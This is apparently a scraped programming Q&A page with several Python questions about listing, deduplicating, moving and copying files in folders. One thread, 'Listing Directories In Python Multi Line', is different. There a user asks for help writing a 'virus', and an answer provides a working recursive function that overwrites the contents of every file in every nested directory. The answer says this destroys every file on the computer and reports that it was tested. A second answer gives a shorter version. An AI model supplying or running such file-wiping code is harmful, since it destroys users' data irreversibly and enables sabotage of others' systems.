Delete copies of files in a folder

Delete copies of files in a folder - python

I have this folder.
Let's consider the files: sub-OAS30027_ses-d1300_run-01_T1w.nii.gz and sub-OAS30027_ses-d1300_run-02_T1w.nii.gz. They have the same initial part of the name, that is sub-OAS30027_ses-d1300.
I would like to code a script in Python that extract only one file among the ones with the same sub-OAS30027_ses-d1300, among the one with the same sub-OAS30031_ses-d0427 and so on. It's not important which file is extracted, just one.
This because sub-OAS30027_ses-d1300_run-01_T1w.nii.gz and sub-OAS30027_ses-d1300_run-02_T1w.nii.gz are like copies and i don't want them.
Could you help me ?

Use the re and os modules :
PS : always have a copy of the original files if something goes wrong, it can be used again.
import os,re
file = os.listdir()
match = []
for i in file:
t = re.findall('_ses\-d(.*?)_',i)
if t :
if t[0] not in match :
match.append(t[0])
else :
os.remove(i)

I tried to keep it as simple as possible. I hope this helps:
import os
directory = 'directory_name' # put in the directory you want to search through
duplicate_file_lst = []
# loop through directory files
for filename in os.listdir(directory):
if filename.startswith("sub-OAS30027_ses-d1300"):
duplicate_file_lst.append(filename)
# Only keeps the first file in the list
for file in duplicate_file_lst:
if file != duplicate_file_lst[0]:
os.remove(file)

Related

How do i make a list with values taken from different text files?

I have a folder, which i want to select manually, with an X number of .txt files. I want to make a program that allows me to run it -> select my folder with files -> And cycle through all files in the folder and take a value from a set place.
I have already made a piece of code that allows me to take the value from the .txt file:
mylines = []
with open ('test1.txt', 'rt') as myfile:
for myline in myfile:
mylines.append(myline)
subline = mylines[58]
sub = subline.split(' ')
print(sub[5])`
EDIT: I also have a piece of code that makes a list of directories with all the files I want to use this on:
'''
import glob
path = r'C:/Users/Etienne/.spyder-py3/test/*.UIT'
files = glob.glob(path)
print(files)
'''
How can I use the first piece of code on every file in the list from the second piece of code so i end up with a list of values?
I never worked with coding but this would make my work a lot faster so I want to pick up python.

If I understood the problem correctly, the os module might be helpful for you.
***os.listdir() method in python is used to get the list of all files and directories in the specified directory.For example;
import os
# Get the list of all files and directories
# in the root directory, you can change your directory
path = "/"
dir_list = os.listdir(path)
print("Files and directories in '", path, "' :")
# print the list
print(dir_list)
with this list you can iterate your txt files.
To additional information you can click
How can I iterate over files in a given directory?

Move files one by one to newly created directories for each file with Python 3

What I have is an initial directory with a file inside D:\BBS\file.x and multiple .txt files in the work directory D:\
What I am trying to do is to copy the folder BBS with its content and incrementing it's name by number, then copy/move each existing .txt file to the newly created directory to make it \BBS1, \BBS2, ..., BBSn (depends on number of the txt).
Visual example of the Before and After:
Initial view of the \WorkFolder
Desired view of the \WorkFolder
Right now I have reached only creating of a new directory and moving txt in it but all at once, not as I would like to. Here's my code:
from pathlib import Path
from shutil import copy
import shutil
import os
wkDir = Path.cwd()
src = wkDir.joinpath('BBS')
count = 0
for content in src.iterdir():
addname = src.name.split('_')[0]
out_folder = wkDir.joinpath(f'!{addname}')
out_folder.mkdir(exist_ok=True)
out_path = out_folder.joinpath(content.name)
copy(content, out_path)
files = os.listdir(wkDir)
for f in files:
if f.endswith(".txt"):
shutil.move(f, out_folder)
I kindly request for assistance with incrementing and copying files one by one to the newly created directory for each as mentioned.
Not much skills with python in general. Python3 OS Windows
Thanks in advance

Now, I understand what you want to accomplish. I think you can do it quite easily by only iterating over the text files and for each one you copy the BBS folder. After that you move the file you are currently at. In order to get the folder_num, you may be able to just access the file name's characters at the particular indexes (e.g. f[4:6]) if the name is always of the pattern TextXX.txt. If the prefix "Text" may vary, it is more stable to use regular expressions like in the following sample.
Also, the function shutil.copytree copies a directory with its children.
import re
import shutil
from pathlib import Path
wkDir = Path.cwd()
src = wkDir.joinpath('BBS')
for f in os.listdir(wkDir):
if f.endswith(".txt"):
folder_num = re.findall(r"\d+", f)[0]
target = wkDir.joinpath(f"{src.name}{folder_num}")
# copy BBS
shutil.copytree(src, target)
# move .txt file
shutil.move(f, target)

Run a script for each txt file in all subfolders

I need to run the following script for each txt file located in all subfolders.
The main folder is "simulations" in which there are different subfolders (called as "year-month-day"). In each subfolder there is a txt file "diagno.inp". I have to run this script for each "diagno.inp" file in order to have a list with the following data (a row for each day):
"year-month-day", "W_int", "W_dir"
Here's the code that is working for only a subfolder. Can you help me to create a loop?
fid=open('/Users/silviamassaro/weather/simulations/20180105/diagno.inp', "r")
subfolder="20180105"
n = fid.read().splitlines()[51:]
for element in n:
"do something" # here code to calculate W_dirand W_int for each day
print (subfolder, W_int, W_dir)

Here's what I usually do when I need to loop over a directory and its child recursively:
import os
main_folder = '/path/to/the/main/folder'
files_to_process = [os.path.join(main_folder, child) for child in os.listdir(main_folder)]
while files_to_process:
child = files_to_process.pop()
if os.path.isdir(child):
files_to_process.extend(os.path.join(child, sub_child) for sub_child in os.listdir(child))
else:
# We have a file here, we can do what we want with it
It's short, but has pretty strong assumptions:
You don't care about the order in which the files are treated.
You only have either directories or regular files in the childs of your entry point.
Edit: added another possible solution using glob, thanks to #jacques-gaudin's comment
This solution has the advantaged that you are sure to get only .inp files, but you are still not sure of their order.
import glob
main_folder = '/path/to/the/main/folder'
files_to_process = glob.glob('%s/**/*.inp' % main_folder, recursive=Tre)
for found_file in files_to_process:
# We have a file here, we can do what we want with it
Hope this helps!

With pathlib you can do something like this:
from pathlib import Path
sim_folder = Path("path/to/simulations/folder")
for inp_file in sim_folder.rglob('*.inp'):
subfolder = inp_file.parent.name
with open(inp_file, 'r') as fid:
n = fid.read().splitlines()[51:]
for element in n:
"do something" # here code to calculate W_dirand W_int for each day
print (subfolder, W_int, W_dir)
Note this is recursively traversing all subfolders to look for .inp files.

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How do I use wild cards in python as specified in a text file

Hello I'm new to python and I'd like to know how to process a .txt file line by line to copy files specifid as wild cards
basically the .txt file looks like this.
bin/
bin/*.txt
bin/*.exe
obj/*.obj
document
binaries
so now with that information I'd like to be able to read my .txt file match the directory copy all the files that start with * for that directory, also I'd like to be able to copy the folders listed in the .txt file. What's the best practical way of doing this? your help is appreciated, thanks.

Here's something to start with...
import glob # For specifying pathnames with wildcards
import shutil # For doing common "shell-like" operations.
import os # For dealing with pathnames
# Grab all the pathnames of all the files matching those specified in `text_file.txt`
matching_pathnames = []
for line in open('text_file.txt','r'):
matching_pathnames += glob.glob(line)
# Copy all the matched files to the same filename + '.new' at the end
for pathname in matching_pathnames:
shutil.copyfile(pathname, '%s.new' % (pathname,))

You might want to look at the glob and re modules
http://docs.python.org/library/glob.html

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Delete copies of files in a folder - python

Use the re and os modules : PS : always have a copy of the original files if something goes wrong, it can be used again. import os,re file = os.listdir() match = [] for i in file: t = re.findall('_ses\-d(.*?)_',i) if t : if t[0] not in match : match.append(t[0]) else : os.remove(i)

Related

How do i make a list with values taken from different text files?

Move files one by one to newly created directories for each file with Python 3

Run a script for each txt file in all subfolders

Listing Directories In Python Multi Line

How do I use wild cards in python as specified in a text file

Categories

Resources